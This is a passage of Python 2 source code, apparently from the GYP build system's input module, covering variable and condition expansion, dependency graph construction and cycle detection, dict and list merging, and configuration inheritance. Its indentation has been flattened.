# {'variables': {'conditions': [['os=="mac"', {'define': 'IS_MAC'}]]},
# 'defines': ['<(define)'],
# 'my_subdict': {'defines': ['<(define)']}},
# will append "IS_MAC" to both "defines" lists.
# Evaluate conditions sections, allowing variable expansions within them
# as well as nested conditionals. This will process a 'conditions' or
# 'target_conditions' section, perform appropriate merging and recursive
# conditional and variable processing, and then remove the conditions section
# from the_dict if it is present.
ProcessConditionsInDict(the_dict, phase, variables, build_file)
# Conditional processing may have resulted in changes to automatics or the
# variables dict. Reload.
variables = variables_in.copy()
LoadAutomaticVariablesFromDict(variables, the_dict)
LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
# Recurse into child dicts, or process child lists which may result in
# further recursion into descendant dicts.
for key, value in the_dict.iteritems():
# Skip "variables" and string values, which were already processed if
# present.
if key == 'variables' or isinstance(value, str):
continue
if isinstance(value, dict):
# Pass a copy of the variables dict so that subdicts can't influence
# parents.
ProcessVariablesAndConditionsInDict(value, phase, variables,
build_file, key)
elif isinstance(value, list):
# The list itself can't influence the variables dict, and
# ProcessVariablesAndConditionsInList will make copies of the variables
# dict if it needs to pass it to something that can influence it. No
# copy is necessary here.
ProcessVariablesAndConditionsInList(value, phase, variables,
build_file)
elif not isinstance(value, int):
raise TypeError, 'Unknown type ' + value.__class__.__name__ + \
' for ' + key
def ProcessVariablesAndConditionsInList(the_list, phase, variables,
build_file):
# Iterate using an index so that new values can be assigned into the_list.
index = 0
while index < len(the_list):
item = the_list[index]
if isinstance(item, dict):
# Make a copy of the variables dict so that it won't influence anything
# outside of its own scope.
ProcessVariablesAndConditionsInDict(item, phase, variables, build_file)
elif isinstance(item, list):
ProcessVariablesAndConditionsInList(item, phase, variables, build_file)
elif isinstance(item, str):
expanded = ExpandVariables(item, phase, variables, build_file)
if isinstance(expanded, str) or isinstance(expanded, int):
the_list[index] = expanded
elif isinstance(expanded, list):
the_list[index:index+1] = expanded
index += len(expanded)
# index now identifies the next item to examine. Continue right now
# without falling into the index increment below.
continue
else:
raise ValueError, \
'Variable expansion in this context permits strings and ' + \
'lists only, found ' + expanded.__class__.__name__ + ' at ' + \
index
elif not isinstance(item, int):
raise TypeError, 'Unknown type ' + item.__class__.__name__ + \
' at index ' + index
index = index + 1
def BuildTargetsDict(data):
"""Builds a dict mapping fully-qualified target names to their target dicts.
|data| is a dict mapping loaded build files by pathname relative to the
current directory. Values in |data| are build file contents. For each
|data| value with a "targets" key, the value of the "targets" key is taken
as a list containing target dicts. Each target's fully-qualified name is
constructed from the pathname of the build file (|data| key) and its
"target_name" property. These fully-qualified names are used as the keys
in the returned dict. These keys provide access to the target dicts,
the dicts in the "targets" lists.
"""
targets = {}
for build_file in data['target_build_files']:
for target in data[build_file].get('targets', []):
target_name = gyp.common.QualifiedTarget(build_file,
target['target_name'],
target['toolset'])
if target_name in targets:
raise GypError('Duplicate target definitions for ' + target_name)
targets[target_name] = target
return targets
def QualifyDependencies(targets):
"""Make dependency links fully-qualified relative to the current directory.
|targets| is a dict mapping fully-qualified target names to their target
dicts. For each target in this dict, keys known to contain dependency
links are examined, and any dependencies referenced will be rewritten
so that they are fully-qualified and relative to the current directory.
All rewritten dependencies are suitable for use as keys to |targets| or a
similar dict.
"""
all_dependency_sections = [dep + op
for dep in dependency_sections
for op in ('', '!', '/')]
for target, target_dict in targets.iteritems():
target_build_file = gyp.common.BuildFile(target)
toolset = target_dict['toolset']
for dependency_key in all_dependency_sections:
dependencies = target_dict.get(dependency_key, [])
for index in xrange(0, len(dependencies)):
dep_file, dep_target, dep_toolset = gyp.common.ResolveTarget(
target_build_file, dependencies[index], toolset)
if not multiple_toolsets:
# Ignore toolset specification in the dependency if it is specified.
dep_toolset = toolset
dependency = gyp.common.QualifiedTarget(dep_file,
dep_target,
dep_toolset)
dependencies[index] = dependency
# Make sure anything appearing in a list other than "dependencies" also
# appears in the "dependencies" list.
if dependency_key != 'dependencies' and \
dependency not in target_dict['dependencies']:
raise GypError('Found ' + dependency + ' in ' + dependency_key +
' of ' + target + ', but not in dependencies')
def ExpandWildcardDependencies(targets, data):
"""Expands dependencies specified as build_file:*.
For each target in |targets|, examines sections containing links to other
targets. If any such section contains a link of the form build_file:*, it
is taken as a wildcard link, and is expanded to list each target in
build_file. The |data| dict provides access to build file dicts.
Any target that does not wish to be included by wildcard can provide an
optional "suppress_wildcard" key in its target dict. When present and
true, a wildcard dependency link will not include such targets.
All dependency names, including the keys to |targets| and the values in each
dependency list, must be qualified when this function is called.
"""
for target, target_dict in targets.iteritems():
toolset = target_dict['toolset']
target_build_file = gyp.common.BuildFile(target)
for dependency_key in dependency_sections:
dependencies = target_dict.get(dependency_key, [])
# Loop this way instead of "for dependency in" or "for index in xrange"
# because the dependencies list will be modified within the loop body.
index = 0
while index < len(dependencies):
(dependency_build_file, dependency_target, dependency_toolset) = \
gyp.common.ParseQualifiedTarget(dependencies[index])
if dependency_target != '*' and dependency_toolset != '*':
# Not a wildcard. Keep it moving.
index = index + 1
continue
if dependency_build_file == target_build_file:
# It's an error for a target to depend on all other targets in
# the same file, because a target cannot depend on itself.
raise GypError('Found wildcard in ' + dependency_key + ' of ' +
target + ' referring to same build file')
# Take the wildcard out and adjust the index so that the next
# dependency in the list will be processed the next time through the
# loop.
del dependencies[index]
index = index - 1
# Loop through the targets in the other build file, adding them to
# this target's list of dependencies in place of the removed
# wildcard.
dependency_target_dicts = data[dependency_build_file]['targets']
for dependency_target_dict in dependency_target_dicts:
if int(dependency_target_dict.get('suppress_wildcard', False)):
continue
dependency_target_name = dependency_target_dict['target_name']
if (dependency_target != '*' and
dependency_target != dependency_target_name):
continue
dependency_target_toolset = dependency_target_dict['toolset']
if (dependency_toolset != '*' and
dependency_toolset != dependency_target_toolset):
continue
dependency = gyp.common.QualifiedTarget(dependency_build_file,
dependency_target_name,
dependency_target_toolset)
index = index + 1
dependencies.insert(index, dependency)
index = index + 1
def Unify(l):
"""Removes duplicate elements from l, keeping the first element."""
seen = {}
return [seen.setdefault(e, e) for e in l if e not in seen]
def RemoveDuplicateDependencies(targets):
"""Makes sure every dependency appears only once in all targets's dependency
lists."""
for target_name, target_dict in targets.iteritems():
for dependency_key in dependency_sections:
dependencies = target_dict.get(dependency_key, [])
if dependencies:
target_dict[dependency_key] = Unify(dependencies)
def Filter(l, item):
"""Removes item from l."""
res = {}
return [res.setdefault(e, e) for e in l if e != item]
def RemoveSelfDependencies(targets):
"""Remove self dependencies from targets that have the prune_self_dependency
variable set."""
for target_name, target_dict in targets.iteritems():
for dependency_key in dependency_sections:
dependencies = target_dict.get(dependency_key, [])
if dependencies:
for t in dependencies:
if t == target_name:
if targets[t].get('variables', {}).get('prune_self_dependency', 0):
target_dict[dependency_key] = Filter(dependencies, target_name)
class DependencyGraphNode(object):
"""
Attributes:
ref: A reference to an object that this DependencyGraphNode represents.
dependencies: List of DependencyGraphNodes on which this one depends.
dependents: List of DependencyGraphNodes that depend on this one.
"""
class CircularException(GypError):
pass
def __init__(self, ref):
self.ref = ref
self.dependencies = []
self.dependents = []
def __repr__(self):
return '<DependencyGraphNode: %r>' % self.ref
def FlattenToList(self):
# flat_list is the sorted list of dependencies - actually, the list items
# are the "ref" attributes of DependencyGraphNodes. Every target will
# appear in flat_list after all of its dependencies, and before all of its
# dependents.
flat_list = []
# in_degree_zeros is the list of DependencyGraphNodes that have no
# dependencies not in flat_list. Initially, it is a copy of the children
# of this node, because when the graph was built, nodes with no
# dependencies were made implicit dependents of the root node.
in_degree_zeros = set(self.dependents[:])
while in_degree_zeros:
# Nodes in in_degree_zeros have no dependencies not in flat_list, so they
# can be appended to flat_list. Take these nodes out of in_degree_zeros
# as work progresses, so that the next node to process from the list can
# always be accessed at a consistent position.
node = in_degree_zeros.pop()
flat_list.append(node.ref)
# Look at dependents of the node just added to flat_list. Some of them
# may now belong in in_degree_zeros.
for node_dependent in node.dependents:
is_in_degree_zero = True
for node_dependent_dependency in node_dependent.dependencies:
if not node_dependent_dependency.ref in flat_list:
# The dependent one or more dependencies not in flat_list. There
# will be more chances to add it to flat_list when examining
# it again as a dependent of those other dependencies, provided
# that there are no cycles.
is_in_degree_zero = False
break
if is_in_degree_zero:
# All of the dependent's dependencies are already in flat_list. Add
# it to in_degree_zeros where it will be processed in a future
# iteration of the outer loop.
in_degree_zeros.add(node_dependent)
return flat_list
def FindCycles(self, path=None):
"""
Returns a list of cycles in the graph, where each cycle is its own list.
"""
if path is None:
path = [self]
results = []
for node in self.dependents:
if node in path:
cycle = [node]
for part in path:
cycle.append(part)
if part == node:
break
results.append(tuple(cycle))
else:
results.extend(node.FindCycles([node] + path))
return list(set(results))
def DirectDependencies(self, dependencies=None):
"""Returns a list of just direct dependencies."""
if dependencies == None:
dependencies = []
for dependency in self.dependencies:
# Check for None, corresponding to the root node.
if dependency.ref != None and dependency.ref not in dependencies:
dependencies.append(dependency.ref)
return dependencies
def _AddImportedDependencies(self, targets, dependencies=None):
"""Given a list of direct dependencies, adds indirect dependencies that
other dependencies have declared to export their settings.
This method does not operate on self. Rather, it operates on the list
of dependencies in the |dependencies| argument. For each dependency in
that list, if any declares that it exports the settings of one of its
own dependencies, those dependencies whose settings are "passed through"
are added to the list. As new items are added to the list, they too will
be processed, so it is possible to import settings through multiple levels
of dependencies.
This method is not terribly useful on its own, it depends on being
"primed" with a list of direct dependencies such as one provided by
DirectDependencies. DirectAndImportedDependencies is intended to be the
public entry point.
"""
if dependencies == None:
dependencies = []
index = 0
while index < len(dependencies):
dependency = dependencies[index]
dependency_dict = targets[dependency]
# Add any dependencies whose settings should be imported to the list
# if not already present. Newly-added items will be checked for
# their own imports when the list iteration reaches them.
# Rather than simply appending new items, insert them after the
# dependency that exported them. This is done to more closely match
# the depth-first method used by DeepDependencies.
add_index = 1
for imported_dependency in \
dependency_dict.get('export_dependent_settings', []):
if imported_dependency not in dependencies:
dependencies.insert(index + add_index, imported_dependency)
add_index = add_index + 1
index = index + 1
return dependencies
def DirectAndImportedDependencies(self, targets, dependencies=None):
"""Returns a list of a target's direct dependencies and all indirect
dependencies that a dependency has advertised settings should be exported
through the dependency for.
"""
dependencies = self.DirectDependencies(dependencies)
return self._AddImportedDependencies(targets, dependencies)
def DeepDependencies(self, dependencies=None):
"""Returns a list of all of a target's dependencies, recursively."""
if dependencies == None:
dependencies = []
for dependency in self.dependencies:
# Check for None, corresponding to the root node.
if dependency.ref != None and dependency.ref not in dependencies:
dependencies.append(dependency.ref)
dependency.DeepDependencies(dependencies)
return dependencies
def _LinkDependenciesInternal(self, targets, include_shared_libraries,
dependencies=None, initial=True):
"""Returns a list of dependency targets that are linked into this target.
This function has a split personality, depending on the setting of
|initial|. Outside callers should always leave |initial| at its default
setting.
When adding a target to the list of dependencies, this function will
recurse into itself with |initial| set to False, to collect dependencies
that are linked into the linkable target for which the list is being built.
If |include_shared_libraries| is False, the resulting dependencies will not
include shared_library targets that are linked into this target.
"""
if dependencies == None:
dependencies = []
# Check for None, corresponding to the root node.
if self.ref == None:
return dependencies
# It's kind of sucky that |targets| has to be passed into this function,
# but that's presently the easiest way to access the target dicts so that
# this function can find target types.
if 'target_name' not in targets[self.ref]:
raise GypError("Missing 'target_name' field in target.")
if 'type' not in targets[self.ref]:
raise GypError("Missing 'type' field in target %s" %
targets[self.ref]['target_name'])
target_type = targets[self.ref]['type']
is_linkable = target_type in linkable_types
if initial and not is_linkable:
# If this is the first target being examined and it's not linkable,
# return an empty list of link dependencies, because the link
# dependencies are intended to apply to the target itself (initial is
# True) and this target won't be linked.
return dependencies
# Don't traverse 'none' targets if explicitly excluded.
if (target_type == 'none' and
not targets[self.ref].get('dependencies_traverse', True)):
if self.ref not in dependencies:
dependencies.append(self.ref)
return dependencies
# Executables and loadable modules are already fully and finally linked.
# Nothing else can be a link dependency of them, there can only be
# dependencies in the sense that a dependent target might run an
# executable or load the loadable_module.
if not initial and target_type in ('executable', 'loadable_module'):
return dependencies
# Shared libraries are already fully linked. They should only be included
# in |dependencies| when adjusting static library dependencies (in order to
# link against the shared_library's import lib), but should not be included
# in |dependencies| when propagating link_settings.
# The |include_shared_libraries| flag controls which of these two cases we
# are handling.
if (not initial and target_type == 'shared_library' and
not include_shared_libraries):
return dependencies
# The target is linkable, add it to the list of link dependencies.
if self.ref not in dependencies:
dependencies.append(self.ref)
if initial or not is_linkable:
# If this is a subsequent target and it's linkable, don't look any
# further for linkable dependencies, as they'll already be linked into
# this target linkable. Always look at dependencies of the initial
# target, and always look at dependencies of non-linkables.
for dependency in self.dependencies:
dependency._LinkDependenciesInternal(targets,
include_shared_libraries,
dependencies, False)
return dependencies
def DependenciesForLinkSettings(self, targets):
"""
Returns a list of dependency targets whose link_settings should be merged
into this target.
"""
# TODO(sbaig) Currently, chrome depends on the bug that shared libraries'
# link_settings are propagated. So for now, we will allow it, unless the
# 'allow_sharedlib_linksettings_propagation' flag is explicitly set to
# False. Once chrome is fixed, we can remove this flag.
include_shared_libraries = \
targets[self.ref].get('allow_sharedlib_linksettings_propagation', True)
return self._LinkDependenciesInternal(targets, include_shared_libraries)
def DependenciesToLinkAgainst(self, targets):
"""
Returns a list of dependency targets that are linked into this target.
"""
return self._LinkDependenciesInternal(targets, True)
def BuildDependencyList(targets):
# Create a DependencyGraphNode for each target. Put it into a dict for easy
# access.
dependency_nodes = {}
for target, spec in targets.iteritems():
if target not in dependency_nodes:
dependency_nodes[target] = DependencyGraphNode(target)
# Set up the dependency links. Targets that have no dependencies are treated
# as dependent on root_node.
root_node = DependencyGraphNode(None)
for target, spec in targets.iteritems():
target_node = dependency_nodes[target]
target_build_file = gyp.common.BuildFile(target)
dependencies = spec.get('dependencies')
if not dependencies:
target_node.dependencies = [root_node]
root_node.dependents.append(target_node)
else:
for dependency in dependencies:
dependency_node = dependency_nodes.get(dependency)
if not dependency_node:
raise GypError("Dependency '%s' not found while "
"trying to load target %s" % (dependency, target))
target_node.dependencies.append(dependency_node)
dependency_node.dependents.append(target_node)
flat_list = root_node.FlattenToList()
# If there's anything left unvisited, there must be a circular dependency
# (cycle). If you need to figure out what's wrong, look for elements of
# targets that are not in flat_list.
if len(flat_list) != len(targets):
raise DependencyGraphNode.CircularException(
'Some targets not reachable, cycle in dependency graph detected: ' +
' '.join(set(flat_list) ^ set(targets)))
return [dependency_nodes, flat_list]
def VerifyNoGYPFileCircularDependencies(targets):
# Create a DependencyGraphNode for each gyp file containing a target. Put
# it into a dict for easy access.
dependency_nodes = {}
for target in targets.iterkeys():
build_file = gyp.common.BuildFile(target)
if not build_file in dependency_nodes:
dependency_nodes[build_file] = DependencyGraphNode(build_file)
# Set up the dependency links.
for target, spec in targets.iteritems():
build_file = gyp.common.BuildFile(target)
build_file_node = dependency_nodes[build_file]
target_dependencies = spec.get('dependencies', [])
for dependency in target_dependencies:
try:
dependency_build_file = gyp.common.BuildFile(dependency)
except GypError, e:
gyp.common.ExceptionAppend(
e, 'while computing dependencies of .gyp file %s' % build_file)
raise
if dependency_build_file == build_file:
# A .gyp file is allowed to refer back to itself.
continue
dependency_node = dependency_nodes.get(dependency_build_file)
if not dependency_node:
raise GypError("Dependancy '%s' not found" % dependency_build_file)
if dependency_node not in build_file_node.dependencies:
build_file_node.dependencies.append(dependency_node)
dependency_node.dependents.append(build_file_node)
# Files that have no dependencies are treated as dependent on root_node.
root_node = DependencyGraphNode(None)
for build_file_node in dependency_nodes.itervalues():
if len(build_file_node.dependencies) == 0:
build_file_node.dependencies.append(root_node)
root_node.dependents.append(build_file_node)
flat_list = root_node.FlattenToList()
# If there's anything left unvisited, there must be a circular dependency
# (cycle).
if len(flat_list) != len(dependency_nodes):
bad_files = []
for file in dependency_nodes.iterkeys():
if not file in flat_list:
bad_files.append(file)
common_path_prefix = os.path.commonprefix(dependency_nodes)
cycles = []
for cycle in root_node.FindCycles():
simplified_paths = []
for node in cycle:
assert(node.ref.startswith(common_path_prefix))
simplified_paths.append(node.ref[len(common_path_prefix):])
cycles.append('Cycle: %s' % ' -> '.join(simplified_paths))
raise DependencyGraphNode.CircularException, \
'Cycles in .gyp file dependency graph detected:\n' + '\n'.join(cycles)
def DoDependentSettings(key, flat_list, targets, dependency_nodes):
# key should be one of all_dependent_settings, direct_dependent_settings,
# or link_settings.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
if key == 'all_dependent_settings':
dependencies = dependency_nodes[target].DeepDependencies()
elif key == 'direct_dependent_settings':
dependencies = \
dependency_nodes[target].DirectAndImportedDependencies(targets)
elif key == 'link_settings':
dependencies = \
dependency_nodes[target].DependenciesForLinkSettings(targets)
else:
raise GypError("DoDependentSettings doesn't know how to determine "
'dependencies for ' + key)
for dependency in dependencies:
dependency_dict = targets[dependency]
if not key in dependency_dict:
continue
dependency_build_file = gyp.common.BuildFile(dependency)
MergeDicts(target_dict, dependency_dict[key],
build_file, dependency_build_file)
def AdjustStaticLibraryDependencies(flat_list, targets, dependency_nodes,
sort_dependencies):
# Recompute target "dependencies" properties. For each static library
# target, remove "dependencies" entries referring to other static libraries,
# unless the dependency has the "hard_dependency" attribute set. For each
# linkable target, add a "dependencies" entry referring to all of the
# target's computed list of link dependencies (including static libraries
# if no such entry is already present.
for target in flat_list:
target_dict = targets[target]
target_type = target_dict['type']
if target_type == 'static_library':
if not 'dependencies' in target_dict:
continue
target_dict['dependencies_original'] = target_dict.get(
'dependencies', [])[:]
# A static library should not depend on another static library unless
# the dependency relationship is "hard," which should only be done when
# a dependent relies on some side effect other than just the build
# product, like a rule or action output. Further, if a target has a
# non-hard dependency, but that dependency exports a hard dependency,
# the non-hard dependency can safely be removed, but the exported hard
# dependency must be added to the target to keep the same dependency
# ordering.
dependencies = \
dependency_nodes[target].DirectAndImportedDependencies(targets)
index = 0
while index < len(dependencies):
dependency = dependencies[index]
dependency_dict = targets[dependency]
# Remove every non-hard static library dependency and remove every
# non-static library dependency that isn't a direct dependency.
if (dependency_dict['type'] == 'static_library' and \
not dependency_dict.get('hard_dependency', False)) or \
(dependency_dict['type'] != 'static_library' and \
not dependency in target_dict['dependencies']):
# Take the dependency out of the list, and don't increment index
# because the next dependency to analyze will shift into the index
# formerly occupied by the one being removed.
del dependencies[index]
else:
index = index + 1
# Update the dependencies. If the dependencies list is empty, it's not
# needed, so unhook it.
if len(dependencies) > 0:
target_dict['dependencies'] = dependencies
else:
del target_dict['dependencies']
elif target_type in linkable_types:
# Get a list of dependency targets that should be linked into this
# target. Add them to the dependencies list if they're not already
# present.
link_dependencies = \
dependency_nodes[target].DependenciesToLinkAgainst(targets)
for dependency in link_dependencies:
if dependency == target:
continue
if not 'dependencies' in target_dict:
target_dict['dependencies'] = []
if not dependency in target_dict['dependencies']:
target_dict['dependencies'].append(dependency)
# Sort the dependencies list in the order from dependents to dependencies.
# e.g. If A and B depend on C and C depends on D, sort them in A, B, C, D.
# Note: flat_list is already sorted in the order from dependencies to
# dependents.
if sort_dependencies and 'dependencies' in target_dict:
target_dict['dependencies'] = [dep for dep in reversed(flat_list)
if dep in target_dict['dependencies']]
# Initialize this here to speed up MakePathRelative.
exception_re = re.compile(r'''["']?[-/$<>^]''')
def MakePathRelative(to_file, fro_file, item):
# If item is a relative path, it's relative to the build file dict that it's
# coming from. Fix it up to make it relative to the build file dict that
# it's going into.
# Exception: any |item| that begins with these special characters is
# returned without modification.
# / Used when a path is already absolute (shortcut optimization;
# such paths would be returned as absolute anyway)
# $ Used for build environment variables
# - Used for some build environment flags (such as -lapr-1 in a
# "libraries" section)
# < Used for our own variable and command expansions (see ExpandVariables)
# > Used for our own variable and command expansions (see ExpandVariables)
# ^ Used for our own variable and command expansions (see ExpandVariables)
#
# "/' Used when a value is quoted. If these are present, then we
# check the second character instead.
#
if to_file == fro_file or exception_re.match(item):
return item
else:
# TODO(dglazkov) The backslash/forward-slash replacement at the end is a
# temporary measure. This should really be addressed by keeping all paths
# in POSIX until actual project generation.
ret = os.path.normpath(os.path.join(
gyp.common.RelativePath(os.path.dirname(fro_file),
os.path.dirname(to_file)),
item)).replace('\\', '/')
if item[-1] == '/':
ret += '/'
return ret
def MergeLists(to, fro, to_file, fro_file, is_paths=False, append=True):
# Python documentation recommends objects which do not support hash
# set this value to None. Python library objects follow this rule.
is_hashable = lambda val: val.__hash__
# If x is hashable, returns whether x is in s. Else returns whether x is in l.
def is_in_set_or_list(x, s, l):
if is_hashable(x):
return x in s
return x in l
prepend_index = 0
# Make membership testing of hashables in |to| (in particular, strings)
# faster.
hashable_to_set = set(x for x in to if is_hashable(x))
for item in fro:
singleton = False
if isinstance(item, str) or isinstance(item, int):
# The cheap and easy case.
if is_paths:
to_item = MakePathRelative(to_file, fro_file, item)
else:
to_item = item
if not isinstance(item, str) or not item.startswith('-'):
# Any string that doesn't begin with a "-" is a singleton - it can
# only appear once in a list, to be enforced by the list merge append
# or prepend.
singleton = True
elif isinstance(item, dict):
# Make a copy of the dictionary, continuing to look for paths to fix.
# The other intelligent aspects of merge processing won't apply because
# item is being merged into an empty dict.
to_item = {}
MergeDicts(to_item, item, to_file, fro_file)
elif isinstance(item, list):
# Recurse, making a copy of the list. If the list contains any
# descendant dicts, path fixing will occur. Note that here, custom
# values for is_paths and append are dropped; those are only to be
# applied to |to| and |fro|, not sublists of |fro|. append shouldn't
# matter anyway because the new |to_item| list is empty.
to_item = []
MergeLists(to_item, item, to_file, fro_file)
else:
raise TypeError, \
'Attempt to merge list item of unsupported type ' + \
item.__class__.__name__
if append:
# If appending a singleton that's already in the list, don't append.
# This ensures that the earliest occurrence of the item will stay put.
if not singleton or not is_in_set_or_list(to_item, hashable_to_set, to):
to.append(to_item)
if is_hashable(to_item):
hashable_to_set.add(to_item)
else:
# If prepending a singleton that's already in the list, remove the
# existing instance and proceed with the prepend. This ensures that the
# item appears at the earliest possible position in the list.
while singleton and to_item in to:
to.remove(to_item)
# Don't just insert everything at index 0. That would prepend the new
# items to the list in reverse order, which would be an unwelcome
# surprise.
to.insert(prepend_index, to_item)
if is_hashable(to_item):
hashable_to_set.add(to_item)
prepend_index = prepend_index + 1
def MergeDicts(to, fro, to_file, fro_file):
# I wanted to name the parameter "from" but it's a Python keyword...
for k, v in fro.iteritems():
# It would be nice to do "if not k in to: to[k] = v" but that wouldn't give
# copy semantics. Something else may want to merge from the |fro| dict
# later, and having the same dict ref pointed to twice in the tree isn't
# what anyone wants considering that the dicts may subsequently be
# modified.
if k in to:
bad_merge = False
if isinstance(v, str) or isinstance(v, int):
if not (isinstance(to[k], str) or isinstance(to[k], int)):
bad_merge = True
elif v.__class__ != to[k].__class__:
bad_merge = True
if bad_merge:
raise TypeError, \
'Attempt to merge dict value of type ' + v.__class__.__name__ + \
' into incompatible type ' + to[k].__class__.__name__ + \
' for key ' + k
if isinstance(v, str) or isinstance(v, int):
# Overwrite the existing value, if any. Cheap and easy.
is_path = IsPathSection(k)
if is_path:
to[k] = MakePathRelative(to_file, fro_file, v)
else:
to[k] = v
elif isinstance(v, dict):
# Recurse, guaranteeing copies will be made of objects that require it.
if not k in to:
to[k] = {}
MergeDicts(to[k], v, to_file, fro_file)
elif isinstance(v, list):
# Lists in dicts can be merged with different policies, depending on
# how the key in the "from" dict (k, the from-key) is written.
#
# If the from-key has ...the to-list will have this action
# this character appended:... applied when receiving the from-list:
# = replace
# + prepend
# ? set, only if to-list does not yet exist
# (none) append
#
# This logic is list-specific, but since it relies on the associated
# dict key, it's checked in this dict-oriented function.
ext = k[-1]
append = True
if ext == '=':
list_base = k[:-1]
lists_incompatible = [list_base, list_base + '?']
to[list_base] = []
elif ext == '+':
list_base = k[:-1]
lists_incompatible = [list_base + '=', list_base + '?']
append = False
elif ext == '?':
list_base = k[:-1]
lists_incompatible = [list_base, list_base + '=', list_base + '+']
else:
list_base = k
lists_incompatible = [list_base + '=', list_base + '?']
# Some combinations of merge policies appearing together are meaningless.
# It's stupid to replace and append simultaneously, for example. Append
# and prepend are the only policies that can coexist.
for list_incompatible in lists_incompatible:
if list_incompatible in fro:
raise GypError('Incompatible list policies ' + k + ' and ' +
list_incompatible)
if list_base in to:
if ext == '?':
# If the key ends in "?", the list will only be merged if it doesn't
# already exist.
continue
if not isinstance(to[list_base], list):
# This may not have been checked above if merging in a list with an
# extension character.
raise TypeError, \
'Attempt to merge dict value of type ' + v.__class__.__name__ + \
' into incompatible type ' + to[list_base].__class__.__name__ + \
' for key ' + list_base + '(' + k + ')'
else:
to[list_base] = []
# Call MergeLists, which will make copies of objects that require it.
# MergeLists can recurse back into MergeDicts, although this will be
# to make copies of dicts (with paths fixed), there will be no
# subsequent dict "merging" once entering a list because lists are
# always replaced, appended to, or prepended to.
is_paths = IsPathSection(list_base)
MergeLists(to[list_base], v, to_file, fro_file, is_paths, append)
else:
raise TypeError, \
'Attempt to merge dict value of unsupported type ' + \
v.__class__.__name__ + ' for key ' + k
def MergeConfigWithInheritance(new_configuration_dict, build_file,
target_dict, configuration, visited):
# Skip if previously visted.
if configuration in visited:
return
# Look at this configuration.
configuration_dict = target_dict['configurations'][configuration]
# Merge in parents.
for parent in configuration_dict.get('inherit_from', []):
MergeConfigWithInheritance(new_configuration_dict, build_file,
target_dict, parent, visited + [configuration])
# Merge it into the new config.
MergeDicts(new_configuration_dict, configuration_dict,
build_file, build_file)
# Drop abstract.
if 'abstract' in new_configuration_dict:
del new_configuration_dict['abstract']
def SetUpConfigurations(target, target_dict):
# key_suffixes is a list of key suffixes that might appear on key names.
# These suffixes are handled in conditional evaluations (for =, +, and ?)
# and rules/exclude processing (for ! and /). Keys with these suffixes
# should be treated the same as keys without.
key_suffixes = ['=', '+', '?', '!', '/']
build_file = gyp.common.BuildFile(target)
# Provide a single configuration by default if none exists.
# TODO(mark): Signal an error if default_configurations exists but
# configurations does not.
if not 'configurations' in target_dict:
target_dict['configurations'] = {'Default': {}}
if not 'default_configuration' in target_dict:
concrete = [i for i in target_dict['configurations'].iterkeys()
if not target_dict['configurations'][i].get('abstract')]
target_dict['default_configuration'] = sorted(concrete)[0]
for configuration in target_dict['configurations'].keys():
old_configuration_dict = target_dict['configurations'][configuration]
# Skip abstract configurations (saves work only).
if old_configuration_dict.get('abstract'):
continue
# Configurations inherit (most) settings from the enclosing target scope.
# Get the inheritance relationship right by making a copy of the target
# dict.
new_configuration_dict = copy.deepcopy(target_dict)
# Take out the bits that don't belong in a "configurations" section.
# Since configuration setup is done before conditional, exclude, and rules
# processing, be careful with handling of the suffix characters used in
# those phases.
delete_keys = []
for key in new_configuration_dict:
key_ext = key[-1:]
if key_ext in key_suffixes:
key_base = key[:-1]
else:
key_base = key
if key_base in non_configuration_keys:
delete_keys.append(key)
for key in delete_keys:
del new_configuration_dict[key]
# Merge in configuration (with all its parents first).
MergeConfigWithInheritance(new_configuration_dict, build_file,
target_dict, configuration, [])
# Put the new result back into the target dict as a configuration.
target_dict['configurations'][configuration] = new_configuration_dict
# Now drop all the abstract ones.
for configuration in target_dict['configurations'].keys():
old_configuration_dict = target_dict['configurations'][configuration]
if old_configuration_dict.get('abstract'):
del target_dict['configurations'][configuration]
# Now that all of the target's configurations have been built, go through
# the target dict's keys and remove everything that's been moved into a
# "configurations" section.
delete_keys = []
for key in target_dict:
key_ext = key[-1:]
if key_ext in key_suffixes:
key_base = key[:-1]
else:
key_base = key
if not key_base in non_configuration_keys:
delete_keys.append(key)
for key in delete_keys:
del target_dict[key]
# Check the configurations to see if they contain invalid keys.
for configuration in target_dict['configurations'].keys():
configuration_dict = target_dict['configurations'][configuration]
for key in configuration_dict.keys():
if key in invalid_configuration_keys:
raise GypError('%s not allowed in the %s configuration, found in '
'target %s' % (key, configuration, target))
def ProcessListFiltersInDict(name, the_dict):
"""Process regular expression and exclusion-based filters on lists.
An exclusion list is in a dict key named with a trailing "!", like
"sources!". Every item in such a list is removed from the associated
main list, which in this example, would be "sources". Removed items are
placed into a "sources_excluded" list in the dict.
Regular expression (regex) filters are contained in dict keys named with a
trailing "/", such as "sources/" to operate on the "sources" list. Regex
filters in a dict take the form:
'sources/': [ ['exclude', '_(linux|mac|win)\\.cc$'],
['include', '_mac\\.cc$'] ],
The first filter says to exclude all files ending in _linux.cc, _mac.cc, and
_win.cc. The second filter then includes all files ending in _mac.cc that
are now or were once in the "sources" list. Items matching an "exclude"
filter are subject to the same processing as would occur if they were listed
by name in an exclusion list (ending in "!"). Items matching an "include"
filter are brought back into the main list if previously excluded by an
exclusion list or exclusion regex filter. Subsequent matching "exclude"
patterns can still cause items to be excluded after matching an "include".
"""
# Look through the dictionary for any lists whose keys end in "!" or "/".
# These are lists that will be treated as exclude lists and regular
# expression-based exclude/include lists. Collect the lists that are
# needed first, looking for the lists that they operate on, and assemble
# then into |lists|. This is done in a separate loop up front, because
# the _included and _excluded keys need to be added to the_dict, and that
# can't be done while iterating through it.
lists = []
del_lists = []
for key, value in the_dict.iteritems():
operation = key[-1]
if operation != '!' and operation != '/':
continue
if not isinstance(value, list):
raise ValueError, name + ' key ' + key + ' must be list, not ' + \
value.__class__.__name__
list_key = key[:-1]
if list_key not in the_dict:
# This happens when there's a list like "sources!" but no corresponding
# "sources" list. Since there's nothing for it to operate on, queue up
# the "sources!" list for deletion now.
del_lists.append(key)
continue
if not isinstance(the_dict[list_key], list):
value = the_dict[list_key]
raise ValueError, name + ' key ' + list_key + \
' must be list, not ' + \
value.__class__.__name__ + ' when applying ' + \
{'!': 'exclusion', '/': 'regex'}[operation]
if not list_key in lists:
lists.append(list_key)
# Delete the lists that are known to be unneeded at this point.
for del_list in del_lists:
del the_dict[del_list]
for list_key in lists:
the_list = the_dict[list_key]
# Initialize the list_actions list, which is parallel to the_list. Each
# item in list_actions identifies whether the corresponding item in
# the_list should be excluded, unconditionally preserved (included), or
